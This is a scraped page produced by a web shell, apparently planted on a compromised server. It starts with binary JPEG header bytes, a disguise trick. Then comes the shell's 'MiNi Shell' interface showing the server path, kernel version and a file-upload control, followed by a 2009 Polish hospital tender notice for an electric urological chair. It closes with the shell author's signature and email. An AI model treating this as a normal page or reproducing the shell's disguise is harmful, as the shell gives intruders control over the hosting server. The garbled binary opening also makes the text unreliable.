JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090811/131597-N-2009.html

<p class="kh_header"><b>Włocławek: DIZ /44/2009</b><br>
<b>Numer ogłoszenia: 131597 - 2009; data zamieszczenia: 11.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki , ul. Wieniecka 49, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 412-94-32, faks 054 4129432.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.republika.szpitalwloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DIZ /44/2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> L. p.	Nazwa asortymentu/parametry	Zamawiana ilość
1	Fotel w pełni elektryczny z regulacjami wysokości, przechyłów wzdłużnych, pleców, siedzenia, realizowanymi ze sterownika nożnego.	1szt.
2	Długość całkowita leża w pozycji poziomej wraz  z materacem:
	z dodatkowym segmentem podudzia -1755mm.	
3	Całkowita szerokość leża wraz z materacem: 740mm,
	szerokość siedziska - 570mm,
	szerokość oparcia pleców - 556mm.	
4	Minimalna wysokość siedziska wraz z materacem:
	w pozycji fotelowej - 660mm.	
5	Maksymalna wysokość siedziska z materacem:
	w pozycji fotelowej - 965mm.	
6	Minimalna wysokość leża wraz z materacem:
	w pozycji poziomej - 845mm.	
7	Maksymalna wysokość leża wraz z materacem:
	w pozycji poziomej -1150mm.	
8	Regulacja oparcia pleców: 0o -  65o.	
9	Elektryczna regulacja pozycji Trenelenburga - 30o .	
10	Elektryczna regulacja pozycji anty-Trenelenburga -  65o.	
11	Fotel wyposażony w podkolanniki i podrączki + uchwyt wielopozycyjnym.	2szt.
12	Fotel wyposażony w miskę urologiczną wraz z siatką z odpływem i filtrowaniem.	1szt.
13	Fotel wyposażony w bezszwowe materace wykonane ze specjalnego antybakteryjnego materiału odpornego na promieniowanie UV.	
14	Materac w segmencie siedzenia z wycięciem klinowym.	1szt.
15	Podstawa jezdna zapewniająca stabilność zabezpieczona osłona z tworzywa, średnica kół 100mm.	
16	Zasilanie 230 ~, 50/60 Hz.	
17	Maksymalny pobór mocy 250W.	
18	Klasa ochrony przed porażeniem elektrycznym II .	
19 	Typ części aplikacyjnych B.	
20	Stopień ochrony przed wpływem środowiska IP X4.	
21 	Dopuszczalne obciążenie 175 kg.	
22	Deklaracje zgodności ,certyfikaty CE	
23	Kopia, certyfikat systemu zarządzania jakością dla wyrobów medycznych ISO 13485:2003 zarówno producenta jak i oferenta jako zapewnienie zgodnej z wszystkimi obowiązującymi normami realizacji zamówienia. 	
24	Kopia ,certyfikat  systemu zarządzania jakością ISO 9001:200 zarówno producenta jak i oferenta jako zapewnienie zgodnej z wszystkimi obowiązującymi normami realizacji zamówienia.	
25	Przeszkolenie wskazanego przez zamawiającego personelu w zakresie obsługi instrumentarium..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> NIE DOTYCZY<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy:
1.	spełniają wymagania określone w Specyfikacji Istotnych Warunków Zamówienia.
2.	spełniają warunki określone w art. 22 ust.1 ustawy tj.
-	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
-    warunek odpis z Krajowego Rejestru Sądowego lub wpisu do Ewidencji Działalności Gospodarczej.
ocena na zasadzie: spełnia  nie spełnia
-	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawia pisemne zobowiązanie in-nych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykona-nia zamówienia,
ocena na zasadzie: spełnia  nie spełnia  
- warunek załączenia oświadczenia wg załącznika nr.2
-	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
ocena na zasadzie: spełnia  nie spełnia
- warunek załączenia oświadczenia wg załącznika nr.2
-	nie podlega wykluczeniu z postępowania o udzielenie zamówienia
ocena na zasadzie: spełnia  nie spełnia

3.	akceptują treść projektu umowy stanowiącego Załącznik nr 5 do SIWZ
4.	załączą oświadczenia i dokumenty przewidziane w Rozdziale VI SIWZ.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a aktualny odpis z właściwego rejestru, albo zaświadczenie o wpisie do ewidencji  działalności 
   gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem  terminu składania ofert;
2. wypełniony i podpisany Druk ofertowy, zgodnie z Załącznikiem nr 1 do niniejszej  
    specyfikacji;
4. oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodnie z Załącznikiem nr 2 
   do niniejszej specyfikacji;
5. oświadczenie o zapoznaniu się z niektórymi przepisami, zgodnie z Załącznikiem nr 3 do    
    niniejszej specyfikacji;
6. oświadczenie o zapoznaniu się ze Specyfikacją Istotnych Warunków Zamówienia, zgodnie z  
    Załącznikiem nr 4 ;
7. zaakceptowany i podpisany projekt umowy stanowiący Załącznik nr 5 do niniejszej   specyfikacji;
8. wykaz wykonanych dostaw podobnego sprzętu medycznego dla placówek ochrony zdrowia, zgodnie 
    z Załącznikiem nr 6  do niniejszej specyfikacji;
9. oświadczenia, że wszystkie oferowane artykuły  spełniają wymogi określone ustawą z 
     dnia  20.04.2004r. o wyrobach medycznych ( Dz. U . z 2004r.,Nr 93, poz.896 ).
10. pełnomocnictwo do reprezentowania Wykonawcy (o ile nie wynika z dokumentów    
      rejestracyjnych)  w przypadku podpisywania oferty przez osobę nie wpisaną do dokumentów 
      rejestracyjnych ;  
11. Dowód uzyskania wpisu oferowanego sprzętu do rejestru wyrobów medycznych - zgodnie z art. 52 i 
     54 ustawy z dnia 20 kwietnia 2004 roku o wyrobach medycznych (Dz.U. Nr 93, poz. 896 ze zm.)

12.	Wykaz wykonanych dostaw sprzętu medycznego , w tym foteli ginekologicznych w wersji urolo-gicznej, bez elementów składowych opcjonalnych dla placówek ochrony zdrowia, wraz z załącze-niem dokumentów potwierdzających, że  wykazane dostawy wykonane z należytą starannością , zgodnie z Załącznikiem nr 6 do niniejszej specyfikacji wykazanie ( w okresie ostatnich 3 lat, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, przed dniem wszczęcia postępowania co najmniej jednej dostawy o charakterze i złożoności porównywalnej z przedmiotem zamówienia (wartość dostawy min. 16 585,00 brutto). Należy dołączyć pisemne potwierdzenie od podmiotów na rzecz których dostawy zostały wykonane iż dostawy o których mowa zostały wykonane należy-cie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.wloclawek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wojewódzki we Włocławku
 ul. Wieniecka 49
87-800 Włocławek
 (budynek  administracji, pokój 303).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2009 godzina 10:00, miejsce: Szpital Wojewódzki we Włocławku
 ul. Wieniecka 49
87-800 Włocławek
 (budynek  administracji, pokój 303).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com